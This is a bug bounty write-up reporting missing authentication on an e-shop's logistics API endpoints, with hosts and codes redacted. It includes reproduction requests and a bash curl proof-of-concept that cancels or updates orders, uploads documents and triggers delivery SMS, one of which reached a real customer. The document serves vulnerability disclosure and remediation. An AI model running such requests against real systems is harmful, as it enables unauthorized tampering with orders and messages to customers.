writeups
highSelfhosted Iranian Bug Bounty ProgramCWE-306: Missing Authentication for Critical Function

Unauthenticated Access to Logistics Order Management Endpoints — Confirmed SMS Trigger

5 min read
  • Improper Access Control

Title#

[High] Unauthenticated Access to Logistics Order Management Endpoints — Confirmed SMS Trigger

CVSS 3.1#

AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N → 7.5 High

Summary#

Five logistics management endpoints under https://[REDACTED]/logistics/api/v1/ perform no authentication check before processing requests. Any unauthenticated caller who possesses a valid order tracking code can cancel orders, update order state, upload arbitrary documents to orders, and trigger delivery code SMS — all without any session or credential.

Affected endpoints (all unauthenticated, no cookie/token required):

  • POST /logistics/api/v1/logistic_order_cancel
  • POST /logistics/api/v1/logistic_order_update
  • POST /logistics/api/v1/logistic_document_upload
  • POST /logistics/api/v1/logistic_send_delivery_code
  • POST /logistics/api/v1/logistic_delivery_activate

Tracking codes follow a numeric or MTNI-prefixed format. An attacker who obtains a valid tracking code (via order confirmation SMS/email, support pages, OSINT, or social engineering) can perform all of the above operations without any account.

Steps to Reproduce#

Step 1 — Confirm no authentication check on cancel endpoint:

code
POST https://[REDACTED]/logistics/api/v1/logistic_order_cancel
Content-Type: application/json

{"tracking_code":"[REDACTED]"}

Response (no auth header, no cookie):

json
{
  "correlation_id": "...",
  "detail": {"detail": "Item not found", "result_code": -1, ...},
  "info": {"en": {"message": "Failed"}},
  "result_code": -1,
  "user_id": "eShop"
}

The response is "Item not found" (not an auth error). The endpoint processes the request and performs a DB lookup without any credential check. The "user_id": "eShop" field confirms a service-level call, not user-level authentication.

Step 2 — Confirm field-level validation (not auth) governs all responses:

code
POST https://[REDACTED]/logistics/api/v1/logistic_order_update
Content-Type: application/json

{}

Response:

json
{"error_collection": ["tracking_code"], "result_code": -1,
 "result_message": "Parameter Error: Some parameters cannot be found"}

Missing tracking_code returns a parameter validation error, not 401/403.

Step 3 — Confirm logistic_document_upload is also unauthenticated:

code
POST https://[REDACTED]/logistics/api/v1/logistic_document_upload
Content-Type: application/json

{}

Response:

json
{"error_collection": ["tracking_code", "doc_string"], "result_code": -1, ...}

Step 4 — Confirmed full execution: trigger delivery SMS on real order without authentication:

code
POST https://[REDACTED]/logistics/api/v1/logistic_send_delivery_code
Content-Type: application/json

{"tracking_code":"[REDACTED]"}

Response (no auth header, no cookie):

json
{
  "correlation_id": "[REDACTED]",
  "info": {
    "en": {"message": "Successful operation"},
    "fa": {"message": "عملیات با موفقیت انجام شد."}
  },
  "result_code": 0
}

SMS was delivered to the order recipient's mobile number. Operation completed server-side with result_code: 0 without any credential or session token. The tracking code used belongs to a confirmed paid order ([REDACTED order ID], product: [REDACTED product], reservation ID: [REDACTED]).

Step 5 — Confirm cancel processes unauthenticated (business-logic-level response, not auth error):

code
POST https://[REDACTED]/logistics/api/v1/logistic_order_cancel
Content-Type: application/json

{"tracking_code":"[REDACTED]"}

Response:

json
{"info": {"en": {"message": "Cancell is not available for this order."}}, "result_code": -1}

Order was found and evaluated by business logic — not rejected by an auth gate. A cancellable order would be cancelled. "user_id": "eShop" confirms service-level impersonation; the endpoint treats every unauthenticated caller as an internal service identity.

Proof of Concept#

bash
#!/usr/bin/env bash
# poc_logistics_unauth.sh — FINDING-003 / r2026-05-24-0007
# No cookies. No tokens. No auth headers.

BASE="https://[REDACTED]"

echo "============================================================"
echo "TARGET:  [REDACTED] (Logistics API)"
echo "VULN:    Missing Authentication on Logistics Endpoints"
echo "REPORT:  r2026-05-24-0007"
echo "IP:      [REDACTED]"
echo "============================================================"
echo

echo "--- STEP 1: Cancel endpoint — DB lookup without auth ---"
curl -s -X POST "$BASE/logistics/api/v1/logistic_order_cancel" \
  -H "Content-Type: application/json" \
  -H "Origin: https://[REDACTED]" \
  -d '{"tracking_code":"[REDACTED]"}' | python3 -m json.tool
echo "^ user_id:eShop = service impersonation. Business logic ran, NOT auth gate."
sleep 1

echo "--- STEP 2: Order update — field validation, not auth error ---"
curl -s -X POST "$BASE/logistics/api/v1/logistic_order_update" \
  -H "Content-Type: application/json" \
  -H "Origin: https://[REDACTED]" \
  -d '{}' | python3 -m json.tool
echo "^ Missing field error = request reached business logic layer unauthenticated."
sleep 1

echo "--- STEP 3: Document upload — unauthenticated ---"
curl -s -X POST "$BASE/logistics/api/v1/logistic_document_upload" \
  -H "Content-Type: application/json" \
  -H "Origin: https://[REDACTED]" \
  -d '{}' | python3 -m json.tool
sleep 1

echo "--- STEP 4: CONFIRMED EXECUTION — send_delivery_code (result_code: 0) ---"
echo "Request: POST /logistics/api/v1/logistic_send_delivery_code  (NO token/cookie)"
curl -s -X POST "$BASE/logistics/api/v1/logistic_send_delivery_code" \
  -H "Content-Type: application/json" \
  -H "Origin: https://[REDACTED]" \
  -d '{"tracking_code":"[REDACTED]"}' | python3 -m json.tool
echo "^ result_code:0 = SUCCESSFUL OPERATION. SMS sent to customer. No auth used."
sleep 1

echo "--- CONTRAST: authenticated-required endpoint returns 401 ---"
curl -s -X POST "$BASE/user/api/v2/get_info" \
  -H "Content-Type: application/json" \
  -H "Origin: https://[REDACTED]" \
  -d '{"cart_count":true,"profile_info":true,"menu":true,"customer_type":true}' | python3 -m json.tool
echo "^ 'invalid authenticated user' = auth IS checked on user endpoints, NOT on logistics."

echo
echo "All logistics endpoints processed requests without authentication."
echo "Step 4 confirms FULL EXECUTION: SMS triggered on real order unauthenticated."

Format analysis:

  • Numeric tracking codes (13 digits): accepted, full execution confirmed
  • MTNI-prefixed codes (without dash, ≤13 chars): accepted, cart_code lookup
  • IP-based rate limit active on some endpoints (~20 req/window)

Impact#

  • [CONFIRMED] Trigger delivery code SMS to any order's recipient — logistic_send_delivery_code executed with result_code: 0 against a real tracking code (paid order, no auth)
  • Cancel any shop order whose tracking code is known — cancel endpoint confirmed to evaluate business logic unauthenticated ("Cancell is not available" vs "Item not found")
  • Update order state on behalf of any customer
  • Upload arbitrary documents to orders (potential stored XSS or malware injection into order records)
  • Activate delivery for any order without possession of the physical delivery code

Tracking codes are obtainable via: order confirmation emails/SMS, customer support social engineering, or enumeration (numeric format, IP rate-limit as only control).

Root Cause#

The /logistics/api/v1/ service routes are not wired through the authentication middleware that protects /user/api/v2/ routes. The logistics service likely assumes callers are internal services and was inadvertently exposed to the internet.

Remediation#

  1. Require authenticated session (token cookie) on all logistics endpoints
  2. Validate that the authenticated user owns the order referenced by tracking_code
  3. If these endpoints are intended for logistics partner use, protect them with service-level API keys rather than exposing them unauthenticated
  4. Audit all /logistics/ routes for similar issues

References#

  • CWE-306: Missing Authentication for Critical Function
  • CWE-284: Improper Access Control
  • OWASP API Security Top 10: API2 — Broken Authentication